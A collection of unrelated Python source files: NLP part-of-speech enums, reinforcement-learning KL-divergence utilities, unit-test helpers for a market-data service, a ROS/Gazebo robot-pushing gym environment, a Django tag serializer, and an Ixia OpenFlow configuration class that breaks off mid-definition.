THIRD (int): Third
REFLEXIVE_PERSON (int): Reflexive
"""
PERSON_UNKNOWN = 0
FIRST = 1
SECOND = 2
THIRD = 3
REFLEXIVE_PERSON = 4
class Proper(enum.IntEnum):
"""
This category shows if the token is part of a proper name.
Attributes:
PROPER_UNKNOWN (int): Proper is not applicable in the analyzed language or is not predicted.
PROPER (int): Proper
NOT_PROPER (int): Not proper
"""
PROPER_UNKNOWN = 0
PROPER = 1
NOT_PROPER = 2
class Reciprocity(enum.IntEnum):
"""
Reciprocal features of a pronoun.
Attributes:
RECIPROCITY_UNKNOWN (int): Reciprocity is not applicable in the analyzed language or is not
predicted.
RECIPROCAL (int): Reciprocal
NON_RECIPROCAL (int): Non-reciprocal
"""
RECIPROCITY_UNKNOWN = 0
RECIPROCAL = 1
NON_RECIPROCAL = 2
class Tag(enum.IntEnum):
"""
The part of speech tags enum.
Attributes:
UNKNOWN (int): Unknown
ADJ (int): Adjective
ADP (int): Adposition (preposition and postposition)
ADV (int): Adverb
CONJ (int): Conjunction
DET (int): Determiner
NOUN (int): Noun (common and proper)
NUM (int): Cardinal number
PRON (int): Pronoun
PRT (int): Particle or other function word
PUNCT (int): Punctuation
VERB (int): Verb (all tenses and modes)
X (int): Other: foreign words, typos, abbreviations
AFFIX (int): Affix
"""
UNKNOWN = 0
ADJ = 1
ADP = 2
ADV = 3
CONJ = 4
DET = 5
NOUN = 6
NUM = 7
PRON = 8
PRT = 9
PUNCT = 10
VERB = 11
X = 12
AFFIX = 13
class Tense(enum.IntEnum):
"""
Time reference.
Attributes:
TENSE_UNKNOWN (int): Tense is not applicable in the analyzed language or is not predicted.
CONDITIONAL_TENSE (int): Conditional
FUTURE (int): Future
PAST (int): Past
PRESENT (int): Present
IMPERFECT (int): Imperfect
PLUPERFECT (int): Pluperfect
"""
TENSE_UNKNOWN = 0
CONDITIONAL_TENSE = 1
FUTURE = 2
PAST = 3
PRESENT = 4
IMPERFECT = 5
PLUPERFECT = 6
class Voice(enum.IntEnum):
"""
The relationship between the action that a verb expresses and the
participants identified by its arguments.
Attributes:
VOICE_UNKNOWN (int): Voice is not applicable in the analyzed language or is not predicted.
ACTIVE (int): Active
CAUSATIVE (int): Causative
PASSIVE (int): Passive
"""
VOICE_UNKNOWN = 0
ACTIVE = 1
CAUSATIVE = 2
PASSIVE = 3
|
import numpy as np
import torch
from utils.it_estimator import entropy as it_entropy
from utils.it_estimator import kldiv
from scipy.stats import multivariate_normal
# Collect samples using the SAC policy
def collect_trajectories_policy(env, sac_agent, n=10000, state_indices=None):
'''
Samples n trajectories from env using sac_agent
:return: N trajectory samples
Tuple of NxTx|S| state array, Nx(T-1) action array, Nx(T-1) action probs array
# Nx(T-1) reward array
'''
T = env.T
s_buffer = np.empty((n, T, env.observation_space.shape[0]), dtype=np.float32)
a_buffer = np.empty((n, T-1, env.action_space.shape[0]), dtype=np.float32)
log_a_buffer = np.empty((n, T-1))
# r_buffer = np.empty((n, T-1))
s = env.reset(n)
for i in range(T-1):
a, logpi = sac_agent.get_action_batch(s)
s_nxt, _, _, _ = env.step(a) # assign reward online
s_buffer[:,i,:] = s
a_buffer[:,i,:] = a
# r_buffer[:,i] = r
log_a_buffer[:,i] = logpi
s = s_nxt
s_buffer[:, T-1, :] = s
s_buffer = s_buffer[:,1:,:] # NOTE
if state_indices is None:
return s_buffer, a_buffer, log_a_buffer
else:
return s_buffer[:, :, state_indices], a_buffer, log_a_buffer
def collect_trajectories_policy_single(env, sac_agent, n=2000, state_indices=None, render=False):
T = sac_agent.max_ep_len
s_buffer = np.empty((n, T+1, env.observation_space.shape[0]), dtype=np.float32)
a_buffer = np.empty((n, T, env.action_space.shape[0]), dtype=np.float32)
log_a_buffer = np.empty((n, T))
for traj_no in range(n):
s = env.reset()
for i in range(T):
a, logpi = sac_agent.get_action(s,get_logprob=True)
s_nxt, _, _, _ = env.step(a) # assign reward online
s_buffer[traj_no,i,:] = s
a_buffer[traj_no,i,:] = a
log_a_buffer[traj_no,i] = logpi
s = s_nxt
if render:
env.render()
s_buffer[traj_no, T, :] = s
s_buffer = s_buffer[:,1:,:] # NOTE
if state_indices is None:
return s_buffer, a_buffer, log_a_buffer
else:
return s_buffer[:, :, state_indices], a_buffer, log_a_buffer
# for KL evaluation
def rejection_sampling(rho_expert, task, env, n=1000, goal_radius=0.5):
# proposal: uniform distribution on grid
# k = max (P(x) / Q(x))
assert task == 'uniform'
k = 2 # 4.0/math.pi
size_x, size_y = env.size_x, env.size_y
Q_density = 1.0/(size_x * size_y)
Q_samples = np.random.uniform((0,0),(size_x,size_y),size=(n, 2))
accepts = np.random.uniform(0, 1, size=(n)) <= (rho_expert(Q_samples) / (k * Q_density)) # u <= p(x) / (k * q(x))
return Q_samples[accepts]
# credit to http://joschu.net/blog/kl-approx.html
# use unbiased, low-variance, nonnegative estimator by John Schulman: f(r) - f'(1) * (r - 1) >= 0
# intuition: E_q[r] = 1, negatively correlated
# E_q [log q/p] = E_q [(r - 1) - log r], r = p/q
def reverse_kl_density_based(agent_states, rho_expert, agent_density):
r = np.clip(rho_expert(agent_states), a_min=1e-8, a_max=None) / np.exp(agent_density.score_samples(agent_states))
return np.mean(r - 1 - np.log(r))
# E_p [log p/q] = E_p [(r - 1) - log r], r = q/p
def forward_kl_density_based(expert_states, rho_expert, agent_density):
r = np.clip(np.exp(agent_density.score_samples(expert_states)), a_min=1e-8, a_max=None) / rho_expert(expert_states)
return np.mean(r - 1 - np.log(r))
# NOTE: the above KL estimator is inaccurate especially for disjoint distributions. But they are smooth to plot and compare.
# If we want accurate estimator, please use it_estimator.kldiv() as below
def reverse_kl_knn_based(expert_states, agent_states):
return kldiv(agent_states, expert_states)
def forward_kl_knn_based(expert_states, agent_states):
return kldiv(expert_states, agent_states)
def entropy(agent_states):
return it_entropy(agent_states)
def expert_samples(env_name, task, rho_expert, range_lim):
trials = 0
n = task['expert_samples_n']
while True:
s = rejection_sampling(env_name, task, rho_expert, range_lim, n)
if trials == 0:
samples = s
else:
samples = np.concatenate((samples, s), axis=0)
print(f"trial {trials} samples {samples.shape[0]}")
trials += 1
if samples.shape[0] >= n:
return samples
# for KL evaluation
def rejection_sampling(env_name, task, rho_expert, range_lim, n=1000):
# proposal: uniform distribution
# k = max (P(x) / Q(x))
assert 'uniform' in task['task_name']
k = 2 # 4.0/math.pi
range_x, range_y = range_lim
Q_density = 1.0/((range_x[1]-range_x[0]) * (range_y[1]-range_y[0]))
Q_samples = np.random.uniform((range_x[0],range_y[0]),(range_x[1],range_y[1]),size=(n, 2))
accepts = np.random.uniform(0, 1, size=(n)) <= (rho_expert(Q_samples) / (k * Q_density)) # u <= p(x) / (k * q(x))
return Q_samples[accepts]
def get_range_lim(env_name, task, env):
# TODO: change to low, high
if env_name in ["ContinuousVecGridEnv-v0", "ReacherDraw-v0"]:
range_x, range_y = env.range_x, env.range_y
elif env_name == "PointMazeRight-v0":
return env.range_lim
return [range_x, range_y]
def gaussian_samples(env_name, task, env, range_lim):
range_x, range_y = range_lim
n = task['expert_samples_n']
if env_name in ['ContinuousVecGridEnv-v0', "ReacherDraw-v0"]:
if task['task_name'] == 'gaussian':
if isinstance(task['goal_radius'], float):
r = task['goal_radius']
else:
r = np.array(task['goal_radius'])
samples = multivariate_normal.rvs(mean=task['goal'], cov=r**2, size=n)
elif task['task_name'] == 'mix_gaussian':
m = len(task['goal'])
z = np.random.choice(m, size=n) # assume equal prob
samples = []
for g, r in zip(task['goal'], task['goal_radius']):
samples.append(multivariate_normal.rvs(mean=g, cov=r**2, size=n))
samples = np.array(samples) # (m, n, 2)
samples = np.take_along_axis(samples, z[None, :, None], axis=0)[0] # like torch.gather, (n, 2)
if env_name == "ReacherDraw-v0":
accepts = (samples[:, 0] ** 2 + samples[:, 1] ** 2) <= env.radius **2
elif env_name in ["ContinuousVecGridEnv-v0"]:
x_bool = np.logical_and(samples[:, 0] <= range_x[1], samples[:, 0] >= range_x[0])
y_bool = np.logical_and(samples[:, 1] <= range_y[1], samples[:, 1] >= range_y[0])
accepts = np.logical_and(x_bool, y_bool)
else:
raise NotImplementedError
print(f"accepts {accepts.sum()}")
return samples[accepts] # discard samples outside support does not change KL ordering
|
"""Unit test package for omicron."""
import asyncio
import json
import logging
import os
import socket
import subprocess
import sys
from contextlib import closing
import aiohttp
import aioredis
import cfg4py
import pandas as pd
cfg = cfg4py.get_instance()
logger = logging.getLogger(__name__)
def find_free_port():
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(("localhost", 0))
# s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = s.getsockname()[1]
return port
async def clear_cache(dsn):
redis = await aioredis.create_redis(dsn)
await redis.flushall()
def init_test_env():
os.environ[cfg4py.envar] = "DEV"
src_dir = os.path.dirname(__file__)
config_path = os.path.join(src_dir, "../omicron/config")
handler = logging.StreamHandler()
fmt = "%(asctime)s %(levelname)-1.1s %(name)s:%(funcName)s:%(lineno)s | %(message)s"
formatter = logging.Formatter(fmt=fmt)
handler.setFormatter(formatter)
logger = logging.getLogger()
logger.addHandler(handler)
return cfg4py.init(config_path, False)
async def is_local_omega_alive(port: int = 3181):
try:
url = f"http://localhost:{port}/sys/version"
async with aiohttp.ClientSession() as client:
async with client.get(url) as resp:
if resp.status == 200:
return await resp.text()
return True
except Exception:
return False
async def start_omega(timeout=60):
port = find_free_port()
cfg.omega.urls.quotes_server = f"http://localhost:{port}"
account = os.environ["JQ_ACCOUNT"]
password = os.environ["JQ_PASSWORD"]
# hack: by default postgres is disabled, but we need it enabled for ut
cfg_ = json.dumps({"postgres": {"dsn": cfg.postgres.dsn, "enabled": "true"}})
process = subprocess.Popen(
[
sys.executable,
"-m",
"omega.app",
"start",
"--impl=jqadaptor",
f"--cfg={cfg_}",
f"--account={account}",
f"--password={password}",
f"--port={port}",
],
env=os.environ,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
for i in range(timeout, 0, -1):
await asyncio.sleep(1)
if process.poll() is not None:
# already exit
out, err = process.communicate()
logger.warning(
"subprocess exited, %s: %s", process.pid, out.decode("utf-8")
)
raise subprocess.SubprocessError(err.decode("utf-8"))
if await is_local_omega_alive(port):
logger.info("omega server is listen on %s", cfg.omega.urls.quotes_server)
return process
raise subprocess.SubprocessError("Omega server malfunction.")
def load_data(sec: str, frame_type: str, ext: str = "csv", sep="\t"):
file = os.path.join(os.path.dirname(__file__), f"{sec}.{frame_type}.{ext}")
df = pd.read_csv(file, sep=sep)
df["frame"] = pd.to_datetime(df["frame"])
return df
|
#!/usr/bin/env python3
import gym
import json
import rospy
import rospkg
import numpy as np
from gym import utils, spaces
from gym.utils import seeding
from std_srvs.srv import Empty
from nav_msgs.msg import Odometry
from sensor_msgs.msg import LaserScan
from gazebo_msgs.srv import SetModelState
from gazebo_msgs.msg import ModelStates, ModelState
from observer import Observer
from navigator import Navigator
from envs.mainEnv import MainEnv
class DeepPusherEnv(MainEnv):
def __init__(self):
# Get ros package path
ros_ = rospkg.RosPack()
ros_path = ros_.get_path('deep-rl-pusher')
MainEnv.__init__(self, ros_path, "deepPusher-v0.launch")
self.unpause = rospy.ServiceProxy('/gazebo/unpause_physics', Empty)
self.pause = rospy.ServiceProxy('/gazebo/pause_physics', Empty)
self.reset_proxy = rospy.ServiceProxy('/gazebo/reset_simulation', Empty)
# Load configs
sim_cfg = self.load_config(ros_path + "/config/sim.config")
self.sim = sim_cfg['sim']['world']
self.obs = sim_cfg['obs']
self.lidar = self.load_config(ros_path + "/config/lidar.config")['lidar']
#self.action_cfg = self.load_config(ros_path + "/config/actions.config")['action_space']
self.action_cfg = self.load_config(ros_path + "/config/actions_mixed.config")['action_space']
self.actions = self.action_cfg['actions']
self.parameters = self.action_cfg['parameters']
rewards_cfg = self.load_config(ros_path + "/config/rewards.config")['rewards']
self.obs_idx_r, self.obs_idx_p, self.rewards, self.penalties, self.r_scale_factor = rewards_cfg['obs_index_r'], rewards_cfg['obs_index_p'], \
rewards_cfg['rewards'], rewards_cfg['penalties'], rewards_cfg['scale_factor']
# Class that handles robot observations
self.observer = Observer()
self.observer.observe()
# Class that handles all navigation
self.navigator = Navigator()
# Actions are loaded from config
self.action_space = spaces.Discrete(len(self.actions))
# Parametrise the steps of the simulation so that we can penalise long solutions
self.steps = 0
self.max_steps = sim_cfg['sim']['max_steps']
self._seed()
# Calculate initial distances
self.last_cyl_dist = self.dist_init(cyl=True)
self.last_goal_dist = self.dist_init(cyl=False)
# Reward clip parameter for sanity
self.reward_clip = rewards_cfg['reward_clip']
# Terminate early if the robot is stuck
self.robot_stuck = 0
self.previous_robot_pose = [0, 0, 0]
def load_config(self, config):
data = None
with open(config) as file:
data = json.load(file)
return data
def dist_init(self, cyl=True):
''' Calculates initial distances for the reward initialisation '''
pose_cyl = [self.sim['target_cyl']['pos']['x'], self.sim['target_cyl']['pos']['y'], self.sim['target_cyl']['pos']['z']]
if cyl:
pose_robot = [self.sim['robot']['pos']['x'], self.sim['robot']['pos']['y'], self.sim['robot']['pos']['z']]
return self.dist_xy(pose_robot, pose_cyl)
else:
pose_goal = [self.sim['goal']['pos']['x'], self.sim['goal']['pos']['y'], self.sim['goal']['pos']['z']]
return self.dist_xy(pose_cyl, pose_goal)
def spawn_random(self, cyl=True, goal=False):
if cyl:
cyl_state = ModelState()
cyl_state.model_name = self.sim['target_cyl']['id']
r = float(self.sim['target_cyl']['radius'])
w = float(self.sim['width'])
l = float(self.sim['length'])
new_x = np.random.uniform(r + 0.2, l / 2 - r + 0.1)
new_y = np.random.uniform(r + 0.1, w - r + 0.1)
cyl_state.pose.position.x = new_x
cyl_state.pose.position.y = new_y
# Must update config dict
self.sim['target_cyl']['pos']['x'] = new_x
self.sim['target_cyl']['pos']['y'] = new_y
print('[ LOG] ..... Update dict target cyl>', new_x, new_y)
# Use Gazebo service in order to change new cylinder pose
rospy.wait_for_service('/gazebo/set_model_state')
try:
set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState)
resp = set_state(cyl_state)
print('[ LOG] ------------', resp)
except (rospy.ServiceException) as e:
print("Service call failed: %s" % e)
if goal:
goal_state = ModelState()
goal_state.model_name = self.sim['goal']['id']
r = float(self.sim['goal']['radius'])
w = float(self.sim['width'])
l = float(self.sim['length'])
offset = l / 2 + r + 0.1
new_x = np.random.uniform(offset, l - r + 0.1)
new_y = np.random.uniform(r + 0.1, w - r + 0.1)
goal_state.pose.position.x = new_x
goal_state.pose.position.y = new_y
# Must update config dict
self.sim['goal']['pos']['x'] = new_x
self.sim['goal']['pos']['y'] = new_y
print('[ LOG] ..... Update dict goal>', new_x, new_y)
# Use Gazebo service in order to change new cylinder pose
rospy.wait_for_service('/gazebo/set_model_state')
try:
set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState)
resp = set_state(goal_state)
print('[ LOG] ------------', resp)
except (rospy.ServiceException) as e:
print("Service call failed: %s" % e)
def at_goal(self, state):
# Unpack state
_, p_target_cyl, p_goal, _, _ = state
# To be at the goal, the distance between the goal and the target cylinder must be < than the goal's radius
r = self.sim['goal']['radius']
dist = self.dist_xy(p_target_cyl, p_goal)
dist = dist - self.sim['target_cyl']['radius']
if dist <= r + 0.02:
return True
return False
def dist_goal(self, state):
''' Calculates distance from robot to goal '''
_, _, p_goal, p_robot, _ = state
return self.dist_xy(p_robot, p_goal)
def dist_cyl(self, state):
''' Calculates distance from robot to target_cyl '''
_, p_target_cyl, _, p_robot, _ = state
return self.dist_xy(p_robot, p_target_cyl)
def dist_cyl_goal(self, state):
''' Calculates distance from target cyl to goal '''
_, p_target_cyl, p_goal, _, _ = state
return self.dist_xy(p_target_cyl, p_goal)
def dist_xy(self, pose1, pose2):
pose1 = np.asarray(pose1)
pose2 = np.asarray(pose2)
if pose1.shape == (3, ) and pose2.shape == (3, ):
pose1 = pose1[:2]
pose2 = pose2[:2]
return np.sqrt(np.sum(np.square(pose1 - pose2)))
def pose_to_array(self, pose):
pose_ = [pose.position.x, pose.position.y, pose.position.z]
return np.asarray(pose_)
def quat_to_array(self, pose):
pose_ = [pose.orientation.w, pose.orientation.x, pose.orientation.y, pose.orientation.z]
return np.asarray(pose_)
def ori_align(self, state):
# Is this correct?
import math
import transforms3d as td3
_, pos_c, pos_g, pos_r, _ = state
# Check slopes between robot(x1, y1) - cyl(x2, y2) / cyl - goal(x3, y3) are close, if they are, robot is aligned with both which is what we want
# ((y1 - y2) * (x1 - x3) - (y1 - y3) * (x1 - x2)) <= 1e-9
ori_diff = ((pos_r[1] - pos_c[1]) * (pos_r[0] - pos_g[0]) - (pos_r[1] - pos_g[1]) * (pos_r[0] - pos_c[0]))
return abs(ori_diff)
def transform_coordinates(self, length, height, x_coord, y_coord):
import math
bucket_cap_l = int(length / self.sim['length'])
bucket_cap_h = int(height / self.sim['width'])
x_bucket = int(x_coord)
y_bucket = int(y_coord)
x_idx = math.modf(x_coord)[0] * bucket_cap_l
y_idx = math.modf(y_coord)[0] * bucket_cap_h
x_img_coord = x_bucket * bucket_cap_l + int(x_idx)
y_img_coord = y_bucket * bucket_cap_h + int(y_idx)
return x_img_coord, y_img_coord
def fill_obs(self, image, x, y, radius):
radius = int(radius)
i_x_b = (x - radius) if (x -radius) in range(0, image.shape[0] + 1) else 0
i_x_a = (x + radius +1) if (x + radius + 1) in range(0, image.shape[0] + 1) else image.shape[0]
i_y_b = (y - radius) if (y -radius) in range(0, image.shape[1] + 1) else 0
i_y_a = (y + radius +1) if (y + radius + 1) in range(0, image.shape[1] + 1) else image.shape[1]
i_x_b, i_x_a = int(i_x_b), int(i_x_a)
i_y_b, i_y_a = int(i_y_b), int(i_y_a)
image[i_x_b:i_x_a, i_y_b:i_y_a] = 1.0
return image
def generate_obs_img(self, pos_c, pos_g, pos_r):
# Get world img sizes
length = round(self.sim['length'] / self.obs['precision'])
height = round(self.sim['width'] / self.obs['precision'])
image = np.zeros((length, height), dtype=np.float16)
# Calculate coordinates for the poses on the image
x_c, y_c = self.transform_coordinates(length, height, pos_c[0], pos_c[1])
x_g, y_g = self.transform_coordinates(length, height, pos_g[0], pos_g[1])
x_r, y_r = self.transform_coordinates(length, height, pos_r[0], pos_r[1])
# Fill in observations
image = self.fill_obs(image, x_c, y_c, self.sim['target_cyl']['radius'] / self.obs['precision'])
image = self.fill_obs(image, x_g, y_g, self.sim['goal']['radius'] / self.obs['precision'])
image = self.fill_obs(image, x_r, y_r, self.sim['robot']['radius'] / self.obs['precision'])
# rotate over y and over x - np.flip(np.flip(a, 0), 1)
return np.flip(np.flip(image, 0), 1)
def check_pose_stuck(self, obs_pose):
if round(obs_pose[0], self.obs['places']) == round(self.previous_robot_pose[0], self.obs['places']) \
and round(obs_pose[1], self.obs['places']) == round(self.previous_robot_pose[1], self.obs['places']):
return True
return False
def discretise_observation(self, state):
_, pose_target_cyl, pose_goal, pose_robot, _ = state
state_img = self.generate_obs_img(pose_target_cyl, pose_goal, pose_robot)
#(x_c, y_c, x_g, y_g, x_r, y_r) = coords
#coords_str = str(x_c) + '|' + str(y_c) + '|' + str(x_g) + '|' + str(y_g) + '|' + str(x_r) + '|' + str(y_r)
#return state_img, coords_str
state_str = np.array2string(state_img, formatter={'float_kind':lambda x: "%.2f" % x})
return state_img, state_str
def observe_lidar(self, data, new_ranges):
d_ranges = []
mod = len(data.ranges) / new_ranges
for i, item in enumerate(data.ranges):
if (i % mod == 0):
if data.ranges[i] == float('Inf') or np.isinf(data.ranges[i]):
d_ranges.append(6)
elif np.isnan(data.ranges[i]):
d_ranges.append(0)
else:
d_ranges.append(int(data.ranges[i]))
return d_ranges
def observe(self):
''' Observe pointcloud '''
data = None
while data is None:
try:
data = rospy.wait_for_message('/scan', LaserScan, timeout=5)
except:
pass
pc = self.observe_lidar(data, 6)
''' Model states can only be observed if we specify it in configuration '''
if self.obs['target_cyl'] and self.obs['goal']:
''' Try to obtain model states from Gazebo '''
obs = None
while obs is None or self.sim['robot']['id'] not in obs.name:
try:
obs = rospy.wait_for_message('/gazebo/model_states', ModelStates, timeout=1)
rospy.sleep(0.8)
except:
pass
idx_target_cyl = obs.name.index(self.sim['target_cyl']['id'])
pose_target_cyl = self.pose_to_array(obs.pose[idx_target_cyl])
idx_goal = obs.name.index(self.sim['goal']['id'])
pose_goal = self.pose_to_array(obs.pose[idx_goal])
# Update config dicts
self.sim['target_cyl']['pos']['x'] = pose_target_cyl[0]
self.sim['target_cyl']['pos']['y'] = pose_target_cyl[1]
self.sim['target_cyl']['pos']['z'] = pose_target_cyl[2]
self.sim['goal']['pos']['x'] = pose_goal[0]
self.sim['goal']['pos']['y'] = pose_goal[1]
self.sim['goal']['pos']['z'] = pose_goal[2]
if self.obs['robot']:
idx_robot = obs.name.index(self.sim['robot']['id'])
pose_robot = self.pose_to_array(obs.pose[idx_robot])
ori_robot = self.quat_to_array(obs.pose[idx_robot])
return (pc, pose_target_cyl, pose_goal, pose_robot, ori_robot)
else:
#TODO
print('Not supported yet.')
''' Robot odometry estimated utilised in case we do not have access to the true pose '''
if not self.obs['robot']:
''' Try to obtain odometry info from robot '''
odom = None
while odom is None:
try:
odom = rospy.wait_for_message('/odom', Odometry, timeout=5)
except:
pass
pose_robot = self.pose_to_array(odom.pose.pose)
ori_robot = self.quat_to_array(odom.pose.pose)
return (pc, pose_target_cyl, pose_goal, pose_robot, ori_robot)
def reward(self, state):
reward = 0.0
# Target cyl distance to goal
dist_goal = self.dist_cyl_goal(state)
# Distance from the robot to the target cylinder
# Either complete or believed by the robot
if self.obs['target_cyl']:
dist_cyl = self.dist_cyl(state)
else:
dist_cyl = self.observer.cyl.dist_to()
# Dist robot to cyl reward
reward_cyl_flag = (self.last_cyl_dist > dist_cyl)
reward += (self.last_cyl_dist - dist_cyl) * self.rewards[self.obs_idx_r['robot_cyl']] * reward_cyl_flag
self.last_cyl_dist = dist_cyl
# Dist cyl to goal reward
reward += (self.last_goal_dist - dist_goal) * self.rewards[self.obs_idx_r['cyl_goal']]
self.last_goal_dist = dist_goal
# Alignment with cyl and goal reward
#reward -= self.ori_align(state)
# Penalise for time step
reward -= self.penalties[self.obs_idx_p['step']]
# Clip
in_range = reward < self.reward_clip and reward > -self.reward_clip
if not(in_range):
reward = np.clip(reward, -self.reward_clip, self.reward_clip)
print('[ EXCEPTION] Warning: reward was outside of range!')
return reward
def _seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def step(self, action):
rospy.wait_for_service('/gazebo/unpause_physics')
try:
self.unpause()
except (rospy.ServiceException) as e:
print("[LOG] /gazebo/unpause_physics service call failed")
if len(self.actions) <= 3:
if action == self.actions['move_forward']:
self.navigator.move_forward(0.35)
elif action == self.actions['move_left']:
self.navigator.move_left(0.15)
elif action == self.actions['move_right']:
self.navigator.move_right(0.15)
else:
if action == self.actions['move_forward']:
self.navigator.move_forward(0.35)
elif action == self.actions['move_left_1']:
self.navigator.move_left(0.10)
elif action == self.actions['move_left_2']:
self.navigator.move_left(0.20)
elif action == self.actions['move_right_1']:
self.navigator.move_right(0.10)
elif action == self.actions['move_right_2']:
self.navigator.move_right(0.20)
# Observe before pausing since our observations depend on Gazebo clock being published
data = self.observe()
#state_img, state = self.discretise_observation(data)
state_img, state = self.discretise_observation(data)
from PIL import Image
im = Image.fromarray((state_img * 255).astype(np.uint8))
im.save("resources/state.png")
if self.steps > 0:
if self.check_pose_stuck(data[3]):
self.robot_stuck += 1
else:
self.robot_stuck = 0
self.previous_robot_pose = data[3]
rospy.wait_for_service('/gazebo/pause_physics')
try:
self.pause()
except (rospy.ServiceException) as e:
print("[LOG] /gazebo/pause_physics service call failed")
done = False
reward = self.reward(data)
if self.at_goal(data):
reward += self.rewards[self.obs_idx_r['at_goal']]
done = True
print("[ENV] Target cylinder is at goal!")
if self.robot_stuck > 6:
done = True
self.robot_stuck = 0
reward -= self.penalties[self.obs_idx_p['robot_stuck']] * self.robot_stuck
print("[ENV] Robot has not altered its position for 6 consecutive time steps.")
self.steps += 1
if self.steps == self.max_steps:
reward -= self.penalties[self.obs_idx_p['max_steps']]
done = True
print("[ENV] Steps taken are over the maximum allowed threshold.")
return state, reward, done, self.observer.cyl.get_layout_dict()
def reset(self):
# Restart environment state and return initial observation
rospy.wait_for_service('/gazebo/reset_simulation')
try:
self.reset_proxy()
except(rospy.ServiceException) as e:
print("[LOG] /gazebo/reset_simulation service call failed")
# Unpause and observe
rospy.wait_for_service('/gazebo/unpause_physics')
try:
self.unpause()
except(rospy.ServiceException) as e:
print("[LOG] /gazebo/unpause_physics service call failed")
# Force new cylinder registration
self.observer.observe(force_ob_cyl=True)
# Observe before pausing since our observations depend on Gazebo clock being published
data = self.observe()
state_img, state = self.discretise_observation(data)
rospy.wait_for_service('/gazebo/pause_physics')
try:
self.pause()
except(rospy.ServiceException) as e:
print("[LOG] /gazebo/pause_physics service call failed")
return state
|
import logging
from rest_framework import serializers
from saas_framework.tags.models import Tag
from rest_framework.relations import PrimaryKeyRelatedField
from saas_framework.workspaces.models import Workspace
logger = logging.getLogger(__name__)
class TagSerializer(serializers.ModelSerializer):
class Meta:
model = Tag
fields = ['id', 'name']
|
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from uhd_restpy.base import Base
from uhd_restpy.files import Files
from typing import List, Any, Union
class SwitchGroupsList(Base):
"""Openflow Switch Groups level Configuration
The SwitchGroupsList class encapsulates a list of switchGroupsList resources that are managed by the system.
A list of resources can be retrieved from the server using the SwitchGroupsList.find() method.
"""
__slots__ = ()
_SDM_NAME = 'switchGroupsList'
_SDM_ATT_MAP = {
'Active': 'active',
'ApplyGroup': 'applyGroup',
'CopyTtlIn': 'copyTtlIn',
'CopyTtlOut': 'copyTtlOut',
'Count': 'count',
'DecrementMplsTtl': 'decrementMplsTtl',
'DecrementNetwork': 'decrementNetwork',
'DescriptiveName': 'descriptiveName',
'GroupType': 'groupType',
'MaxNumberOfGroups': 'maxNumberOfGroups',
'Name': 'name',
'Output': 'output',
'ParentSwitch': 'parentSwitch',
'PopMpls': 'popMpls',
'PopPbb': 'popPbb',
'PopVlan': 'popVlan',
'PushMpls': 'pushMpls',
'PushPbb': 'pushPbb',
'PushVlan': 'pushVlan',
'SetField': 'setField',
'SetMplsTtl': 'setMplsTtl',
'SetNetwork': 'setNetwork',
'SetQueue': 'setQueue',
}
_SDM_ENUM_MAP = {
}
def __init__(self, parent, list_op=False):
super(SwitchGroupsList, self).__init__(parent, list_op)
@property
def Active(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Checked or Unchecked based on the Group Type selections in Groups tab under OF Switch tab-page.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Active']))
@property
def ApplyGroup(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Group Action:Apply Group.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ApplyGroup']))
@property
def CopyTtlIn(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Group Action:Copy TTL inwards from outermost to next-to-outermost.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['CopyTtlIn']))
@property
def CopyTtlOut(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Group Action:Copy TTL outwards from next-to-outermost to outermost.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['CopyTtlOut']))
@property
def Count(self):
# type: () -> int
"""
Returns
-------
- number: Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
"""
return self._get_attribute(self._SDM_ATT_MAP['Count'])
@property
def DecrementMplsTtl(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Group Action:Decrement MPLS TTL.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['DecrementMplsTtl']))
@property
def DecrementNetwork(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Group Action:Decrement IP TTL.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['DecrementNetwork']))
@property
def DescriptiveName(self):
# type: () -> str
"""
Returns
-------
- str: Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
"""
return self._get_attribute(self._SDM_ATT_MAP['DescriptiveName'])
@property
def GroupType(self):
